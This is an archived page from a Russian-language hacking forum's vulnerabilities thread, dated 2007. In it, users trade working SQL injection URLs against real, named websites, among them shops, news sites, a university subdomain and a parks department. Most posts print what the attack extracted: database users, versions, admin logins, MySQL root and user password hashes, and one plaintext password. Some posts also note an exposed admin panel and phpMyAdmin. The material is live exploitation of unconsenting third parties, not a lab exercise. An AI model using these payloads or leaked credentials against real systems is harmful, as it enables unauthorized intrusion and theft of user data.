ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3901  
Старый 29.11.2007, 21:51
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

Код HTML:
http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,5,6,7,8,9,10,11/*&item=galleries
Код HTML:
http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,id,0x3a,login,0x3a,password),6,7,8,9,10,11+from+adm_users/*&item=galleries
Admin
login: BG
password (hash): 7fd6766a2eef757f37d022422fe8aff5

Последний раз редактировалось trumps; 29.11.2007 в 21:57..
 
Ответить с цитированием

edu
  #3902  
Старый 29.11.2007, 22:03
Underwit
Banned
Регистрация: 06.10.2006
Сообщений: 288
Провел на форуме:
2741921

Репутация: 469
По умолчанию edu

Цитата:
http://lapa.princeton.edu/peopledetail.php?ID=-1+union+select+1,2,3,4,user,password,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39+from+mysql.user/*
MySql5 hash
root *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3
 
Ответить с цитированием

  #3903  
Старый 29.11.2007, 22:13
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Код:
http://www.minneapolisparks.org/default.asp?PageID=4&parkid=1+or+1=(SELECT+TOP+1+cast(LOGON_ID+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)+from+users+where+USER_ID=2)--
 
Ответить с цитированием

  #3904  
Старый 29.11.2007, 23:12
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

SHOP.
www.russki-shop.de
Код:
http://www.russki-shop.de/details.php?Id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+--+
4.1.10a-standard-log

столбец пароля
Код:
http://www.russki-shop.de/details.php?Id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(pwd,0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+--+
Код:
123
Подбирайте user' а
 
Ответить с цитированием

  #3905  
Старый 30.11.2007, 00:49
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Ещё один бажный молдавский магазин
pacnet.md
_http://www.pacnet.md/index.php?page=catalogue&cat_id=4&type_id=-1+UNION+SELECT+1,2,VERSION(),4,5,6,7,8/*
5.0.44-log и этим всё сказано
 
Ответить с цитированием

  #3906  
Старый 30.11.2007, 01:15
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

PR:4
Код:
http://www.ipoteka.md/ro/law.php?ID=-5+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),user(),version(),database()),11,12,13,14,15,16/*
ipoteka_ipoteka@sr.dualg.com:4.1.19-standard-log:ipoteka_ipoteka

PR:4
Код:
http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+union+select+concat_ws(char(58),user(),version(),database())/*
coruptie@localhost:4.1.21:coruptie_rabota

PR:3
Код:
http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,concat_ws(char(58),user(),version(),database()),3/*
6847@localhost:5.0.27:6847

Код:
http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,table_name,3+from+information_schema.tables+limit+1,1/*
rgb_members

Код:
http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,concat_ws(char(58),name,password),3+from+rgb_members/*
OzzZZ:6055322b3c1cc50cef132211ca57aa75
 
Ответить с цитированием

  #3907  
Старый 30.11.2007, 01:21
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Аргументы и Факты (Молдова)

PR:3

Код:
http://www.aif.md/index.php?id=-240+union+select+1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8/*
aif@localhost:4.1.14:aif
 
Ответить с цитированием

  #3908  
Старый 30.11.2007, 09:45
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Италия

consunigo.it
Код:
http://www.consunigo.it/news_dettaglio.php?idn=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14,15,16/*
4.0.18-standard:consunigo:root@localhost

cai.mo.it
Код:
http://www.cai.mo.it/soggiorno.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
4.0.27-standard-log:Sql58426_1:Sql58426@62.149.140.27

В табе user нашёл поля id_user,user и email
Поле с паролем не нашёл

-------------------------------------------------------------------

Powered By Giaretta Immobiliare a Venezia

Уязвимость в скрипте sezione.php.

Примеры:
Код:
http://www.giaretta.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
Код:
http://www.cadeimiracoli.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
Код:
http://www.choosevenice.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
5.0.27:giaretta:dbuser@localhost
 
Ответить с цитированием

  #3909  
Старый 30.11.2007, 12:24
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Сайт охотников и рыболовов.
Код:
http://www.ohota-ribalka.com.ua/sthunt_1.htm?id=-14+UNION+SELECT+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+phpbb_users/*
+ есть открытая админка(без ввода пароля)
+ есть доступ к phpmyadmin
(ссылки запостил в разделе Админки)

Тур Агенство Велес-тур
Код:
http://www.veles-tour.ru/animals.php?animal=-10+union+select+1,2,user()/*
4.0.27-log
velestour
velestour@zvm5.host.ru
 
Ответить с цитированием

  #3910  
Старый 30.11.2007, 16:56
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Италия

recensito.net
Код:
http://www.recensito.net/sezione.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/*
4.1.22-standard-log:Sql81530_4:Sql81530@62.149.130.119

centroeinaudi.it
Код:
http://www.centroeinaudi.it/web/dinamico/sezione.php?id=-1+union+select+1,2,3,4,5,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),7,8,9,10/*
4.1.15-Debian_1ubuntu5-log:centroeinaudi:centroeinaudi@localhost

cogepiemonte.it
Код:
http://www.cogepiemonte.it/news.php?f=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user())/*
4.0.26-debug:cogepiemonte:cogepiemonte@localhost

нашёл лишь табу news

editoriaragazzi.com
Код:
http://www.editoriaragazzi.com/sezione.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11/*
5.0.45-community-log:Sql137750_5:Sql137750@62.149.140.190
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ